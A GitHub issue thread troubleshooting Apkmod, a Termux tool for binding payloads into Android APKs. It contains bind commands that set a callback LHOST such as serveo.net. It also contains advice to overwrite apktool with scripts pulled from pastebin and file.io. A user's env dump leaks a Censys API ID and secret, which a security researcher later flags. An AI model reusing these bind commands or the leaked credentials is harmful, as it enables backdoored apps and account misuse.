### ISSUE TITLE
libz relocation error 

### ISSUE THREAD

**Issue by bl4ckholez** [Hax4us/Apkmod#3]
[+] Copying APKs...
done.
[+] Decompiling APKs...

(standard_in) 1: syntax error
/data/data/com.termux/files/usr/bin/apkmod: line 118: [: 1: unary operator expected
[*] Decompiling /data/data/com.termux/files/home/Linder/TempP/e.apk
Error relocating /data/data/com.termux/files/usr/lib/libz.so.1: __errno: symbol not found
[*] Decompiled into /data/data/com.termux/files/home/Linder/TempP/e
(standard_in) 1: syntax error
/data/data/com.termux/files/usr/bin/apkmod: line 118: [: 1: unary operator expected
[*] Decompiling /data/data/com.termux/files/home/Linder/TempP/payload.apk
Error relocating /data/data/com.termux/files/usr/lib/libz.so.1: __errno: symbol not found
[*] Decompiled into /data/data/com.termux/files/home/Linder/TempP/payload

done.
[+] Copying payload smali codes to target apk...
cp: cannot stat 'payload/smali/com/': No such file or directory
done.
[+] Fetching Package Name & MainActivity smali location
ERROR OCCURED! EXITING...

[Errno 2] No such file or directory: 'e/AndroidManifest.xml'

**Comment by Hax4us** [comment]
Plz update apkmod by `apkmod -u` then try again. By the way, Apkmod has its own bind feature so you can try 
`apkmod -b /path/to/your/app.apk LHOST=yourlhost LPORT=yourport -o /path/to/final/app.pak`

**Comment by bl4ckholez** [comment]
##### termux-info

System information:
Linux localhost 3.18.24-perf-gc0dfdcc #1 SMP PREEMPT Tue Nov 8 03:54:04 CST 2016 aarch64 Android
Termux-packages arch:
aarch64
Android version:
6.0.1
Device manufacturer:
asus
Device model:
ASUS_Z017DB

#### apktool -version

Error relocating /data/data/com.termux/files/usr/lib/libz.so.1: __errno: symbol not found


### apkmod -v

1.2

**Comment by Hax4us** [comment]
Check alpine is working or not , by executing `startalpine` and try following command inside alpine :
1. `apktool -version`

**Comment by bl4ckholez** [comment]
startalpine
[root@localhost home]# apktool -version
2.4.0

**Comment by Hax4us** [comment]
Try this `bash $(which apktool) -version` and give output

**Comment by bl4ckholez** [comment]
bash $(which apktool) -version
Error relocating /data/data/com.termux/files/usr/lib/libz.so.1: __errno: symbol not found

**Comment by hocinelop** [comment]
Same problem

**Comment by Hax4us** [comment]
@bl4ckholez try this in termux
1. `unset LD_LIBRARY_PATH` then
2. `apktool -version`

**Comment by hocinelop** [comment]
@Hax4us 
CANNOT LINK EXECUTABLE "proot": library "libtalloc.so.2" not found
[1]    22690 abort      apktool -version

**Comment by bl4ckholez** [comment]
unset LD_LIBRARY_PATH
CANNOT LINK EXECUTABLE: library "libandroid-support.so" not found
page record for 0x7f9cc5a010 was not found (block_size=16)
() ○ [u0_a284@localhost] ~
→ apktool -version
CANNOT LINK EXECUTABLE: library "libtalloc.so.2" not found
CANNOT LINK EXECUTABLE: library "libandroid-support.so" not found
page record for 0x7fa620a010 was not found (block_size=16)

**Comment by Hax4us** [comment]
@bl4ckholez @hocinelop  try this now in termux 
1. `wget https://pastebin.com/raw/AxJmaf6r -O $PREFIX/share/TermuxAlpine/usr/bin/apktool`
2. Then Try again `apktool -version`

**Comment by bl4ckholez** [comment]
wget https://pastebin.com/raw/AxJmaf6r -O $PREFIX/share/TermuxAlpine/usr/bin/apktool
--2019-09-19 19:08:44--  https://pastebin.com/raw/AxJmaf6r
Resolving pastebin.com...
104.22.3.84, 104.22.2.84, 2606:4700:10::6816:254, ...
Connecting to pastebin.com|104.22.3.84|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘/data/data/com.termux/files/usr/share/TermuxAlpine/usr/bin/apktool’

/data/data/com.ter     [ <=>            ]     123  --.-KB/s    in 0s

2019-09-19 19:09:12 (6.12 MB/s) - ‘/data/data/com.termux/files/usr/share/TermuxAlpine/usr/bin/apktool’ saved [123]

### apktool -version

Error relocating /data/data/com.termux/files/usr/lib/libz.so.1: __errno: symbol not found

**Comment by Hax4us** [comment]
@bl4ckholez whats output of `env`

**Comment by bl4ckholez** [comment]
env
SHELL=/data/data/com.termux/files/usr/bin/bash                             LSCOLORS=Gxfxcxdxdxegedabagacad
GREP_COLOR=1;33
HISTCONTROL=ignorespace:erasedups
HISTSIZE=5000
BASH_IT=/data/data/com.termux/files/home/.bash_it
PREFIX=/data/data/com.termux/files/usr
CENSYS_API_ID=c95768c1-31a9-4a28-b488-f1acfb1fd45c
PWD=/data/data/com.termux/files/home                                       TODO=t
CENSYS_API_SECRET=VMZdaTQOnM4R0A2LjRnmGmJKep3sHKAT
EXTERNAL_STORAGE=/sdcard
LD_PRELOAD=/data/data/com.termux/files/usr/lib/libtermux-exec.so
GIT_HOSTING=git@git.domain.com                                             HOME=/data/data/com.termux/files/home
LANG=en_US.UTF-8
AUTOFEATURE=true autotest
TMPDIR=/data/data/com.termux/files/usr/tmp
ANDROID_DATA=/data
TERM=xterm-256color
IRC_CLIENT=irssi                                                           BASH_IT_THEME=nwinkler_random_colors
SHLVL=1
ANDROID_ROOT=/system
LD_LIBRARY_PATH=/data/data/com.termux/files/usr/lib
PATH=/data/data/com.termux/files/usr/bin:/data/data/com.termux/files/usr/bin/applets
OLDPWD=/data/data/com.termux/files/home/.bash_it
SCM_CHECK=true
_=/data/data/com.termux/files/usr/bin/env

**Comment by Hax4us** [comment]
try :
1. `curl https://file.io/yjRHQi -o $(which apktool)`
2. `apktool -version`

**Comment by hocinelop** [comment]
curl https://file.io/B1wbtE -o $(which apktool)
apktool -version                                             /data/data/com.termux/files/usr/bin/apktool: 2: /data/data/com.termux/files/usr/bin/apktool: Syntax error: newline unexpected

**Comment by bl4ckholez** [comment]
### LINK FILE 404 NOT FOUND.
https://file.io/B1wbtE

**Comment by rk649477** [comment]
$ apkmod -b /data/data/com.termux/files/home/r.apk -o /sdcard LHOST=server.net LPORT=4444
[*] Binding /storage/emulated/0
Using APK template: /storage/emulated/0
Error: The following options failed to validate: LHOST, LPORT.
[!] Can't bind, take screenshot and open a issue on github
$

**Comment by Hax4us** [comment]
> ### LINK FILE 404 NOT FOUND.
> https://file.io/B1wbtE

Oops sorry file was deleted now I uploaded again : 
1. `curl -L https://gist.githubusercontent.com/Hax4us/594aa21bb7d18f5fc2e9eba9b6e15433/raw/ac6b04f1495febf2ca06c3eb544934fd781daaa2/apktool_termux.sh -o $(which apktool)`
2. `apktool -version`

**Comment by Hax4us** [comment]
> $ apkmod -b /data/data/com.termux/files/home/r.apk -o /sdcard LHOST=server.net LPORT=4444
> [*] Binding /storage/emulated/0
> Using APK template: /storage/emulated/0
> Error: The following options failed to validate: LHOST, LPORT.
> [!] Can't bind, take screenshot and open a issue on github
> $

Your __LHOST__  is wrong so give valid one.

**Comment by rk649477** [comment]
apkmod -b /data/data/com.termux/files/home/r.apk -o /sdcard LHOST=127.0.0.1
LPORT=4444
[*] Binding /storage/emulated/0
Using APK template: /storage/emulated/0
Error: The following options failed to validate: LHOST, LPORT.
[!] Can't bind, take screenshot and open a issue on github

**Comment by rk649477** [comment]
apkmod -b /data/data/com.termux/files/home/r.apk -o /sdcard LHOST=127.0.0.1 LPORT=4444
[*] Binding /storage/emulated/0
Using APK template: /storage/emulated/0
Error: The following options failed to validate: LHOST, LPORT.
[!] Can't bind, take screenshot and open a issue on github

**Comment by rk649477** [comment]
apkmod -b $HOME/app.apk -o $HOME LHOST=serveo.net LPORT=1492
/data/data/com.termux/files/usr/bin/apkmod: line 132: bc: command not found
/data/data/com.termux/files/usr/bin/apkmod: line 132: [: 1: unary operator expected
[*] Binding /data/data/com.termux/files/home/app.apk
Using APK template: /data/data/com.termux/files/home/app.apk
Error: Malformed version number string 2.4.0
Picked up _JAVA_OPTIONS: -Duser.home=/data/data/com.termux/files/home -Djava.io.tmpdir=/data/data/com.termux/files/usr/tmp
[*] Binded to /data/data/com.termux/files/home

Mailformed error a rha he

**Comment by Hax4us** [comment]
@rk649477 don't mix different type of issues in one hence open your separate issue.

**Comment by bl4ckholez** [comment]
curl -L https://gist.githubusercontent.com/Hax4us/594aa21bb7d18f5fc2e9eba9b6e15433/raw/ac6b04f1495febf2ca06c3eb544934fd781daaa2/apktool_termux.sh -o $(which apktool)
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   382  100   382    0     0    451      0 --:--:-- --:--:-- --:--:--   451

### apktool -version
2.4.0

**Comment by Hax4us** [comment]
@bl4ckholez update your apkmod to v1.3 by `apkmod -u` and issue should be solved now

**Comment by bl4ckholez** [comment]
apkmod -u
[!] Invalid option: -u

**Comment by Hax4us** [comment]
> apkmod -u
> [!] Invalid option: -u

I see , I forget to add -u option well then install manually from README instructions and don't forget to remove or delete old setup.sh file before downloading new one

**Comment by Hax4us** [comment]
You can reopen it if problem still exist.

**Comment by whitehattamil** [comment]
cannot link executable "proot": library "libtalloc.so.2" not found
Please help me

**Comment by Hax4us** [comment]
try `apt update && apt upgrade` then reinstall apkmod by `apkmod -u`

**Comment by whitehattamil** [comment]
It worked thanks

**Comment by vi-shalt** [comment]
![Screenshot_20200504-144517_Termux](https://user-images.githubusercontent.com/64343457/80951650-e6736100-8e15-11ea-9e68-b9a711442767.jpg)
Bro plz help

**Comment by joeleonjr** [comment]
Hi! I'm a security researcher @TruffleSecurity. I found a valid API key leaked in a comment in this Issue. I highly recommend rotating the API key immediately (not just deleting the comment). Here's a blog post I wrote on remediating these types of vulnerabilities: https://trufflesecurity.com/blog/remediate-leaked-api-keys-with-key-rotation.<br><br>If you can't find the leaked API key, you can use the following [TruffleHog](https://github.com/trufflesecurity/trufflehog) command to automatically scan for it:<br>`trufflehog github --repo https://github.com/<your_username>/<your_reponame> --issue-comments --only-verified`<br><br>If it's not clear where/what the security issue is, please let me know. I'd be happy to help. Please note that the API key might be in the past edit of a comment.<br><br><br><br>(cc @bl4ckholez)
